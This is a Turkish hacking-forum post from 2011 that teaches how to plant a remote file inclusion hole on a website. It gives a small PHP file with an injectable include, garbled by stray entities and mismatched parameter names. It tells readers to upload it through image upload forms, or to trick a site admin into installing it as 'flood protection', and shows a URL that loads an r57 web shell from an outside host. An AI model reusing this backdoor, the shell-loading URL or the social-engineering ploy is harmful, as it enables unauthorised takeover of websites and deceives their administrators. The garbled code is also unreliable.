THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Sitede RFI Acıgı Olusturma

kadiir - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2007
Nereden:
istanbul
Mesajlar:
250
Konular:
113
Teşekkür (Etti):
16
Teşekkür (Aldı):
143
Ticaret:
(0) %
31-05-2011 11:37
#1
Sitede RFI Acıgı Olusturma
şimdi Bi sitede rfi açığı oluşturmayı ve bu açıktan yararlanmayı vs... göstereceğim!.



örneğin bu kodu




Kod:
<?
include ($silent.&񗝉../config.php&&#358217 ;
?>


not defterinde farklı kaydet deyip , test.php olarak kaydedersek bunu bi siteye attığımızda sitede "include ($piero" bundan dolayı RFI açığı oluşacaktır.mesela resim upload scriptlerinde bazen shell boyutu büyük olduğu için kabul etmez bunu upload edip sitede RFI açığı olusturup aynen böle sitenin shelline girebilirsiniz!.



www.Site.Com/path/test.php?Krezus=http://the-sabotage.org/hack/shell/r57.txt?



Veya Diğer Sitelerde de geçerli bu dosyayı mesela hedef sitenin adminine flooddan koruyo fln diye sosyal mühendislik yöntemleriyle yollayıp ftpye attırcaksınız ve o sitede de RFI açığı oluşacak flood dan koruyo derseniz ordaki piero'yu flood yapın daha inandırıcı olur.


alıntı ::



Bir Tesekur Yeter..

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler